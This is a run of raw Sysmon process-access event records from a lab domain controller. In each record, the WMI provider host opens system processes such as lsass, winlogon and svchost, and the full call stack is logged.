15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.835{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026320Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026319Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 